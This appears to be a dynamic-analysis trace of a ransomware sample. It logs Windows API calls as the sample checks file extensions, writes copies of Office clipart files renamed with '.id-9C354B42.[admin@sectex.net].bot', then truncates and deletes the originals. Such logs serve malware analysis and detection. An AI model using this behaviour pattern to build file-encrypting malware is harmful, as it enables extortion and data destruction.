	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".doc") returned 4
	[0139.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString=".docx") returned 5
	[0139.861] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.861] lstrlenW (lpString=".pdf") returned 4
	[0139.861] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString=".xls") returned 4
	[0139.861] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.861] lstrlenW (lpString=".xlsx") returned 5
	[0139.861] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.861] lstrlenW (lpString=".ppt") returned 4
	[0139.861] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.861] lstrlenW (lpString=".zip") returned 4
	[0139.861] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.861] lstrlenW (lpString=".rar") returned 4
	[0139.861] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString=".bz2") returned 4
	[0139.861] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString=".7z") returned 3
	[0139.861] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.861] lstrlenW (lpString=".dbf") returned 4
	[0139.861] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.861] lstrlenW (lpString=".1cd") returned 4
	[0139.861] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.861] lstrlenW (lpString=".jpg") returned 4
	[0139.861] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.862] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.862] lstrlenW (lpString="BD00146_.WMF") returned 12
	[0139.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.862] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=28948) returned 1
	[0139.862] CloseHandle (hObject=0x37c) returned 1
	[0139.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 0x20
	[0139.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.863] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.863] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.863] GetLastError () returned 0x0
	[0139.863] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x7114, lpOverlapped=0x0) returned 1
	[0139.865] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x7120, lpOverlapped=0x0) returned 1
	[0139.867] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.867] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.867] SetEndOfFile (hFile=0x398) returned 1
	[0139.867] CloseHandle (hObject=0x398) returned 1
	[0139.867] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.867] SetEndOfFile (hFile=0x37c) returned 1
	[0139.869] CloseHandle (hObject=0x37c) returned 1
	[0139.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.885] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 1
	[0139.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.885] lstrlenW (lpString=".doc") returned 4
	[0139.885] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.885] lstrlenW (lpString=".docx") returned 5
	[0139.885] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.885] lstrlenW (lpString=".pdf") returned 4
	[0139.885] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.885] lstrlenW (lpString=".xls") returned 4
	[0139.885] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.885] lstrlenW (lpString=".xlsx") returned 5
	[0139.885] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.885] lstrlenW (lpString=".ppt") returned 4
	[0139.885] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.885] lstrlenW (lpString=".zip") returned 4
	[0139.885] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.885] lstrlenW (lpString=".rar") returned 4
	[0139.885] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.885] lstrlenW (lpString=".bz2") returned 4
	[0139.885] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString=".7z") returned 3
	[0139.886] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString=".dbf") returned 4
	[0139.886] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString=".1cd") returned 4
	[0139.886] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString=".jpg") returned 4
	[0139.886] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString=".doc") returned 4
	[0139.886] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString=".docx") returned 5
	[0139.886] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.886] lstrlenW (lpString=".pdf") returned 4
	[0139.886] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString=".xls") returned 4
	[0139.886] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.886] lstrlenW (lpString=".xlsx") returned 5
	[0139.886] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.886] lstrlenW (lpString=".ppt") returned 4
	[0139.886] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.886] lstrlenW (lpString=".zip") returned 4
	[0139.886] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.886] lstrlenW (lpString=".rar") returned 4
	[0139.886] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.886] lstrlenW (lpString=".bz2") returned 4
	[0139.886] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.887] lstrlenW (lpString=".7z") returned 3
	[0139.887] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.887] lstrlenW (lpString=".dbf") returned 4
	[0139.887] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.887] lstrlenW (lpString=".1cd") returned 4
	[0139.887] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63
	[0139.887] lstrlenW (lpString=".jpg") returned 4
	[0139.887] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.887] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.887] lstrlenW (lpString="BD00155_.WMF") returned 12
	[0139.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.004] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11636) returned 1
	[0140.004] CloseHandle (hObject=0x37c) returned 1
	[0140.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 0x20
	[0140.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.118] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.118] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.157] GetLastError () returned 0x0
	[0140.157] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2d74, lpOverlapped=0x0) returned 1
	[0140.169] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2d80, lpOverlapped=0x0) returned 1
	[0140.170] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.170] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.170] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.176] CloseHandle (hObject=0x3ac) returned 1
	[0140.176] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.176] SetEndOfFile (hFile=0x37c) returned 1
	[0140.178] CloseHandle (hObject=0x37c) returned 1
	[0140.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 1
	[0140.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.349] lstrlenW (lpString=".doc") returned 4
	[0140.349] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.349] lstrlenW (lpString=".docx") returned 5
	[0140.349] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.349] lstrlenW (lpString=".pdf") returned 4
	[0140.349] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.349] lstrlenW (lpString=".xls") returned 4
	[0140.349] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.349] lstrlenW (lpString=".xlsx") returned 5
	[0140.349] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.349] lstrlenW (lpString=".ppt") returned 4
	[0140.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.349] lstrlenW (lpString=".zip") returned 4
	[0140.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.349] lstrlenW (lpString=".rar") returned 4
	[0140.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.349] lstrlenW (lpString=".bz2") returned 4
	[0140.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.349] lstrlenW (lpString=".7z") returned 3
	[0140.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.349] lstrlenW (lpString=".dbf") returned 4
	[0140.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString=".1cd") returned 4
	[0140.350] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString=".jpg") returned 4
	[0140.350] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString=".doc") returned 4
	[0140.350] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString=".docx") returned 5
	[0140.350] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.350] lstrlenW (lpString=".pdf") returned 4
	[0140.350] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString=".xls") returned 4
	[0140.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.350] lstrlenW (lpString=".xlsx") returned 5
	[0140.350] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.350] lstrlenW (lpString=".ppt") returned 4
	[0140.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString=".zip") returned 4
	[0140.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.350] lstrlenW (lpString=".rar") returned 4
	[0140.350] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString=".bz2") returned 4
	[0140.350] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString=".7z") returned 3
	[0140.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.350] lstrlenW (lpString=".dbf") returned 4
	[0140.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.351] lstrlenW (lpString=".1cd") returned 4
	[0140.351] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63
	[0140.351] lstrlenW (lpString=".jpg") returned 4
	[0140.351] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.351] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.351] lstrlenW (lpString="BD07804_.WMF") returned 12
	[0140.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.366] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4924) returned 1
	[0140.366] CloseHandle (hObject=0x37c) returned 1
	[0140.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 0x20
	[0140.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.553] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.553] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.626] GetLastError () returned 0x0
	[0140.626] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x133c, lpOverlapped=0x0) returned 1
	[0140.663] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1340, lpOverlapped=0x0) returned 1
	[0140.664] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.664] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.664] SetEndOfFile (hFile=0x31c) returned 1
	[0140.674] CloseHandle (hObject=0x31c) returned 1
	[0140.675] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.675] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.681] CloseHandle (hObject=0x3ac) returned 1
	[0140.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.759] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 1
	[0140.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.775] lstrlenW (lpString=".doc") returned 4
	[0140.775] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.775] lstrlenW (lpString=".docx") returned 5
	[0140.775] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.775] lstrlenW (lpString=".pdf") returned 4
	[0140.775] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.775] lstrlenW (lpString=".xls") returned 4
	[0140.775] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.775] lstrlenW (lpString=".xlsx") returned 5
	[0140.775] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.775] lstrlenW (lpString=".ppt") returned 4
	[0140.775] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.775] lstrlenW (lpString=".zip") returned 4
	[0140.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.776] lstrlenW (lpString=".rar") returned 4
	[0140.776] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString=".bz2") returned 4
	[0140.776] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString=".7z") returned 3
	[0140.776] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString=".dbf") returned 4
	[0140.776] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString=".1cd") returned 4
	[0140.776] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString=".jpg") returned 4
	[0140.776] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63
	[0140.776] lstrlenW (lpString=".doc") returned 4
	[0140.776] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
